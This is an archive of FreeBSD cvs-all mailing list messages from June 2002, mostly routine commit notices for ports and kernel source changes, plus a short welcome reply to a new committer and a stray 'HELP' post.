Private: tobez@tobez.org | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 8:36:42 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2DE1D37B439; Mon, 17 Jun 2002 08:36:38 -0700 (PDT) Received: (from glewis@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HFZ9p63212; Mon, 17 Jun 2002 08:35:09 -0700 (PDT) (envelope-from glewis) Message-Id: <200206171535.g5HFZ9p63212@freefall.freebsd.org> From: Greg Lewis Date: Mon, 17 Jun 2002 08:35:09 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/databases/java-sqlrelay Makefile ports/databases/jdbc-oracle816 Makefile ports/japanese/netypesv Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG glewis 2002/06/17 08:35:09 PDT Modified files: databases/java-sqlrelay Makefile databases/jdbc-oracle816 Makefile japanese/netypesv Makefile Log: Fix dependencies to be in sync with the recent JDK ports renaming. Forgotten by: znerd Revision Changes Path 1.3 +2 -2 ports/databases/java-sqlrelay/Makefile 1.3 +1 -1 ports/databases/jdbc-oracle816/Makefile 1.2 +1 -1 ports/japanese/netypesv/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 8:46:19 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9334637B40E; Mon, 17 Jun 2002 08:46:13 -0700 (PDT) Received: (from jake@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HFiAo64285; Mon, 17 Jun 2002 08:44:10 -0700 (PDT) (envelope-from jake) Message-Id: <200206171544.g5HFiAo64285@freefall.freebsd.org> From: Jake Burkholder Date: Mon, 17 Jun 2002 08:44:10 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sparc64/include vmparam.h src/sys/sparc64/sparc64 pmap.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jake 2002/06/17 08:44:10 PDT Modified files: sys/sparc64/include vmparam.h sys/sparc64/sparc64 pmap.c Log: Add constants for the min and max prom addresses. Use these instead of magic numbers. Use stxa_sync instead of stxa; membar #Sync; to ensure that no instruction is placed between the two. This can cause random corruption even though interrupts are already disabled. Revision Changes Path 1.10 +3 -0 src/sys/sparc64/include/vmparam.h 1.60 +3 -3 src/sys/sparc64/sparc64/pmap.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 9:15:42 2002 Delivered-To: cvs-all@freebsd.org Received: from joy-tech.com.tw (adsl1.joy-tech.com.tw [211.72.118.2]) by hub.freebsd.org (Postfix) with ESMTP id B0C2237B403 for ; Mon, 17 Jun 2002 09:15:35 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by joy-tech.com.tw (Postfix) with ESMTP id 84DF4100F3; Tue, 18 Jun 2002 00:15:32 +0800 (CST) Received: by joy-tech.com.tw (Postfix, from userid 1007) id AC254100C1; Tue, 18 Jun 2002 00:15:31 +0800 (CST) Date: Tue, 18 Jun 2002 00:15:31 +0800 From: Mailing List Subscriber To: cvs-all@FreeBSD.ORG Subject: HELP Message-ID: <20020617161531.GA80157@gate.joy-tech.com.tw> Mime-Version: 1.0 Content-Type: text/plain; charset=big5 Content-Disposition: inline User-Agent: Mutt/1.3.99i X-Virus-Scanned: by AMaViS perl-11 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG HELP To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 9:29:37 2002 Delivered-To: cvs-all@freebsd.org Received: from gioria.dyndns.org (AFontenayssB-104-1-3-39.abo.wanadoo.fr [80.11.10.39]) by hub.freebsd.org (Postfix) with ESMTP id AAC6837B41D; Mon, 17 Jun 2002 09:28:47 -0700 (PDT) Received: by gioria.dyndns.org (Postfix, from userid 80) id 8B849374B8; Mon, 17 Jun 2002 18:33:14 +0200 (CEST) Received: from 192.168.0.3 ( [192.168.0.3]) as user eagle@localhost by imp.gioria.dyndns.org with HTTP; Mon, 17 Jun 2002 18:33:14 +0200 Message-ID: <1024331594.3d0e0f4a6adb3@imp.gioria.dyndns.org> Date: Mon, 17 Jun 2002 18:33:14 +0200 From: Sebastien Gioria To: Ceri Davies Cc: blackend@FreeBSD.org, cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: CVSROOT access References: <200206162202.g5GM2WN57007@freefall.freebsd.org> <20020617081951.GC4907@submonkey.net> In-Reply-To: <20020617081951.GC4907@submonkey.net> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 192.168.0.3 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > On Sun, Jun 16, 2002 at 03:02:32PM -0700, Nik Clayton wrote: > > nik 2002/06/16 15:02:32 PDT > > > > Modified files: > > . access > > Log: > > It is my great pleasure to welcome Marc Fonvieille (blackend) to the > > funny farm, for services above and beyond the call of duty to the -doc > PR > > list. Marc will be mentored by Giorgos as he joins our happy family. > > About time too. > Glad to have you onboard (and not hammering my mailbox with PRs), Marc. > Cackle. Hohohohohohohohohoho !!!!! Welcome aboard Marc !!!! Great to see you on this damny project ;-) -- Sebastien Gioria gioria@{FreeBSD,FreeBSD-FR}.ORG French FreeBSD User Group http://www.FreeBSD-FR.ORG YM!: eagle_4242 IRC: eagle42[_]? ICQ:110946002 ...and on the eighth day God created FreeBSD To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 9:42:50 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 88B1937B417; Mon, 17 Jun 2002 09:42:44 -0700 (PDT) Received: (from znerd@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HGgi974822; Mon, 17 Jun 2002 09:42:44 -0700 (PDT) (envelope-from znerd) Message-Id: <200206171642.g5HGgi974822@freefall.freebsd.org> From: Ernst de Haan Date: Mon, 17 Jun 2002 09:42:44 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/java Makefile ports/java/jdk-tutorial Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG znerd 2002/06/17 09:42:44 PDT Modified files: java Makefile Removed files: java/jdk-tutorial Makefile distinfo pkg-comment pkg-descr pkg-plist Log: Renamed jdk-tutorial to java-tutorial. Revision Changes Path 1.57 +1 -1 ports/java/Makefile 1.25 +0 -34 ports/java/jdk-tutorial/Makefile (dead) 1.14 +0 -1 ports/java/jdk-tutorial/distinfo (dead) 1.2 +0 -1 ports/java/jdk-tutorial/pkg-comment (dead) 1.3 +0 -4 ports/java/jdk-tutorial/pkg-descr (dead) 1.14 +0 -3359 ports/java/jdk-tutorial/pkg-plist (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 9:43:47 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E514F37B40C; Mon, 17 Jun 2002 09:43:43 -0700 (PDT) Received: (from znerd@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HGhhB74929; Mon, 17 Jun 2002 09:43:43 -0700 (PDT) (envelope-from znerd) Message-Id: <200206171643.g5HGhhB74929@freefall.freebsd.org> From: Ernst de Haan Date: Mon, 17 Jun 2002 09:43:43 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG znerd 2002/06/17 09:43:43 PDT Modified files: . modules Log: Renamed java/jdk-tutorial to java/java-tutorial. Revision Changes Path 1.5371 +1 -1 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 9:48: 0 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7843137B401; Mon, 17 Jun 2002 09:47:55 -0700 (PDT) Received: (from knu@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HGltf75269; Mon, 17 Jun 2002 09:47:55 -0700 (PDT) (envelope-from knu) Message-Id: <200206171647.g5HGltf75269@freefall.freebsd.org> From: Akinori MUSHA Date: Mon, 17 Jun 2002 09:47:55 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: www/en/projects cvsweb.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG knu 2002/06/17 09:47:55 PDT Modified files: en/projects cvsweb.sgml Log: - Mention the new maintainer, Ville Skytt,Ad(B . - Mention the new list, freebsd-cvsweb@FreeBSD.org. - Fix some marking mistakes. Revision Changes Path 1.2 +16 -7 www/en/projects/cvsweb.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 9:57: 4 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C29A637B401; Mon, 17 Jun 2002 09:56:59 -0700 (PDT) Received: (from jhay@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HGuxc76227; Mon, 17 Jun 2002 09:56:59 -0700 (PDT) (envelope-from jhay) Message-Id: <200206171656.g5HGuxc76227@freefall.freebsd.org> From: John Hay Date: Mon, 17 Jun 2002 09:56:59 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/i386/isa isa_compat.h X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jhay 2002/06/17 09:56:59 PDT Modified files: (Branch: RELENG_4) sys/i386/isa isa_compat.h Log: Oops missed this one, part of: MFC: Move the ar(4) and sr(4) drivers to sys/dev and make modules out of them. Revision Changes Path 1.27.2.10 +1 -11 src/sys/i386/isa/isa_compat.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 10:37:37 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5472737B41B; Mon, 17 Jun 2002 10:37:32 -0700 (PDT) Received: (from lioux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HHbWl84688; Mon, 17 Jun 2002 10:37:32 -0700 (PDT) (envelope-from lioux) Message-Id: <200206171737.g5HHbWl84688@freefall.freebsd.org> From: Mario Sergio Fujikawa Ferreira Date: Mon, 17 Jun 2002 10:37:31 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/understand_c Makefile distinfo ports/devel/understand_ada Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG lioux 2002/06/17 10:37:31 PDT Modified files: devel/understand_c Makefile distinfo devel/understand_ada Makefile distinfo Log: Update to 1.4 Build 166 Revision Changes Path 1.28 +1 -1 ports/devel/understand_ada/Makefile 1.26 +1 -1 ports/devel/understand_ada/distinfo 1.47 +1 -1 ports/devel/understand_c/Makefile 1.44 +1 -1 ports/devel/understand_c/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 11:26: 6 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8BA4437B419; Mon, 17 Jun 2002 11:26:03 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HINJ795607; Mon, 17 Jun 2002 11:23:19 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206171823.g5HINJ795607@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 11:23:19 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/science/libsvm Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 11:23:19 PDT Modified files: science/libsvm Makefile distinfo Log: upgrade to 2.35 PR: 39418 Submitted by: maintainer Revision Changes Path 1.3 +2 -2 ports/science/libsvm/Makefile 1.2 +1 -1 ports/science/libsvm/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 11:40:17 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D48CC37B438; Mon, 17 Jun 2002 11:40:03 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HIZSd97395; Mon, 17 Jun 2002 11:35:28 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206171835.g5HIZSd97395@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 11:35:28 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 11:35:28 PDT Modified files: . modules Log: rhtvision --> ports/devel/rhtvision Revision Changes Path 1.5372 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 11:40:30 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8D3C037B423; Mon, 17 Jun 2002 11:40:04 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HIZQo97358; Mon, 17 Jun 2002 11:35:26 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206171835.g5HIZQo97358@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 11:35:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel Makefile ports/devel/rhtvision Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 11:35:25 PDT Modified files: devel Makefile Added files: devel/rhtvision Makefile distinfo pkg-comment pkg-descr pkg-plist Log: add rhtvision 1.1.4 Complete C++ Text User Interface (TUI) library PR: 39419 Submitted by: Hye-Shik Chang Revision Changes Path 1.847 +1 -0 ports/devel/Makefile 1.1 +24 -0 ports/devel/rhtvision/Makefile (new) 1.1 +1 -0 ports/devel/rhtvision/distinfo (new) 1.1 +1 -0 ports/devel/rhtvision/pkg-comment (new) 1.1 +5 -0 ports/devel/rhtvision/pkg-descr (new) 1.1 +140 -0 ports/devel/rhtvision/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 12: 4:47 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B41FA37B404; Mon, 17 Jun 2002 12:04:42 -0700 (PDT) Received: (from mph@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HJ4g001568; Mon, 17 Jun 2002 12:04:42 -0700 (PDT) (envelope-from mph) Message-Id: <200206171904.g5HJ4g001568@freefall.freebsd.org> From: Matthew Hunt Date: Mon, 17 Jun 2002 12:04:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/irc Makefile ports/irc/yagirc Makefile distinfo pkg-comment pkg-descr pkg-plist ports/irc/yagirc/files patch-aa patch-ab patch-ac patch-ad X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mph 2002/06/17 12:04:42 PDT Modified files: irc Makefile Removed files: irc/yagirc Makefile distinfo pkg-comment pkg-descr pkg-plist irc/yagirc/files patch-aa patch-ab patch-ac patch-ad Log: Remove "yagirc" port. It is BROKEN and appears no longer to be maintained by the author (e.g. we were hosting the distfile ourselves). Revision Changes Path 1.48 +0 -1 ports/irc/Makefile 1.26 +0 -28 ports/irc/yagirc/Makefile (dead) 1.6 +0 -2 ports/irc/yagirc/distinfo (dead) 1.4 +0 -22 ports/irc/yagirc/files/patch-aa (dead) 1.2 +0 -10 ports/irc/yagirc/files/patch-ab (dead) 1.2 +0 -45 ports/irc/yagirc/files/patch-ac (dead) 1.2 +0 -10 ports/irc/yagirc/files/patch-ad (dead) 1.3 +0 -1 ports/irc/yagirc/pkg-comment (dead) 1.6 +0 -2 ports/irc/yagirc/pkg-descr (dead) 1.4 +0 -25 ports/irc/yagirc/pkg-plist (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 12:16:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5EFBD37B404; Mon, 17 Jun 2002 12:16:54 -0700 (PDT) Received: (from alfred@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HJGr207191; Mon, 17 Jun 2002 12:16:53 -0700 (PDT) (envelope-from alfred) Message-Id: <200206171916.g5HJGr207191@freefall.freebsd.org> From: Alfred Perlstein Date: Mon, 17 Jun 2002 12:16:52 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/netgraph ng_pppoe.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alfred 2002/06/17 12:16:52 PDT Modified files: (Branch: RELENG_4) sys/netgraph ng_pppoe.c Log: Unbreak modules build by removing duplicate function 'send_sessionid()'. Revision Changes Path 1.23.2.13 +0 -17 src/sys/netgraph/ng_pppoe.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 12:20:54 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4CF5A37B407; Mon, 17 Jun 2002 12:20:48 -0700 (PDT) Received: (from glewis@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HJK5907521; Mon, 17 Jun 2002 12:20:05 -0700 (PDT) (envelope-from glewis) Message-Id: <200206171920.g5HJK5907521@freefall.freebsd.org> From: Greg Lewis Date: Mon, 17 Jun 2002 12:20:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/cadaver Makefile ports/www/cadaver/files patch-aa X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG glewis 2002/06/17 12:20:05 PDT Modified files: www/cadaver Makefile www/cadaver/files patch-aa Log: Unbreak this port by using the included libneon and expat. The API for neon has changed incompatibly since the last release of cadaver so it won't compile against our installed version of neon. The included version of neon doesn't appear to like the installed version of expat, so use the included version of that too. The load order of libraries needed changing to ensure that the included version of neon is used. These changes should be reverted if/when a newer release of cadaver catches up with the neon API. Revision Changes Path 1.13 +3 -5 ports/www/cadaver/Makefile 1.2 +10 -4 ports/www/cadaver/files/patch-aa To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 12:24: 6 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B052137B420; Mon, 17 Jun 2002 12:23:56 -0700 (PDT) Received: (from alfred@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HJNgK08392; Mon, 17 Jun 2002 12:23:42 -0700 (PDT) (envelope-from alfred) Message-Id: <200206171923.g5HJNgK08392@freefall.freebsd.org> From: Alfred Perlstein Date: Mon, 17 Jun 2002 12:23:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/kern sys_process.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alfred 2002/06/17 12:23:42 PDT Modified files: (Branch: RELENG_4) sys/kern sys_process.c Log: Prevent DoS: Do not allow one to trace an ancestor when one is being traced. PR: kern/29741 MFC: 1.90 Revision Changes Path 1.51.2.4 +7 -1 src/sys/kern/sys_process.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 12:28:24 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 80C2137B40B; Mon, 17 Jun 2002 12:28:21 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HJSLe08850; Mon, 17 Jun 2002 12:28:21 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206171928.g5HJSLe08850@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 12:28:21 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/security/amavis-perl Makefile pkg-install.postfix pkg-message.postfix X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 12:28:21 PDT Modified files: security/amavis-perl Makefile Added files: security/amavis-perl pkg-install.postfix pkg-message.postfix Log: add support for postfix and exim PR: 32471 Submitted by: Martijn Lina , TAKEMURA Masahiro Tested by: TERAMOTO Masahiro , "Julian C. Dunn" Approved by: maintainer timeout (1 month since I mailed him) Revision Changes Path 1.6 +15 -3 ports/security/amavis-perl/Makefile 1.1 +31 -0 ports/security/amavis-perl/pkg-install.postfix (new) 1.1 +22 -0 ports/security/amavis-perl/pkg-message.postfix (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 12:29: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 08DF537B40F; Mon, 17 Jun 2002 12:29:00 -0700 (PDT) Received: (from roberto@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HJT0208987; Mon, 17 Jun 2002 12:29:00 -0700 (PDT) (envelope-from roberto) Message-Id: <200206171929.g5HJT0208987@freefall.freebsd.org> From: Ollivier Robert Date: Mon, 17 Jun 2002 12:28:59 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/neon Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG roberto 2002/06/17 12:28:59 PDT Modified files: www/neon Makefile distinfo pkg-plist Log: Update to neon 0.21.2 (PR has 0.21.1). It will help bringing the subversion port up to date. PR: ports/38860 Approved by: Garrett Rooney (MAINTAINER) Revision Changes Path 1.15 +21 -6 ports/www/neon/Makefile 1.12 +1 -1 ports/www/neon/distinfo 1.11 +1 -1 ports/www/neon/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 12:35:55 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AF32F37B411; Mon, 17 Jun 2002 12:35:51 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HJZJx10189; Mon, 17 Jun 2002 12:35:19 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206171935.g5HJZJx10189@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 12:35:19 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-fonts/gfe Makefile ports/x11-fonts/gfe/files patch-src:main.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 12:35:17 PDT Modified files: x11-fonts/gfe Makefile Added files: x11-fonts/gfe/files patch-src:main.c Log: fix locale messages in some dialog box bump portrevision PR: 35325 Submitted by: Kang-min Liu Approved by: maintainer timeout (1 month since I mailed him) Revision Changes Path 1.2 +1 -0 ports/x11-fonts/gfe/Makefile 1.1 +11 -0 ports/x11-fonts/gfe/files/patch-src:main.c (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 12:38: 4 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7E13937B403; Mon, 17 Jun 2002 12:38:00 -0700 (PDT) Received: (from nectar@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HJaU910392; Mon, 17 Jun 2002 12:36:30 -0700 (PDT) (envelope-from nectar) Message-Id: <200206171936.g5HJaU910392@freefall.freebsd.org> From: Jacques Vidrine Date: Mon, 17 Jun 2002 12:36:30 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/py-kjbuckets Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nectar 2002/06/17 12:36:30 PDT Modified files: devel/py-kjbuckets Makefile Log: The master site seems to have been down for awhile. Host this locally for now. Reported by: fenner's distfile survey Revision 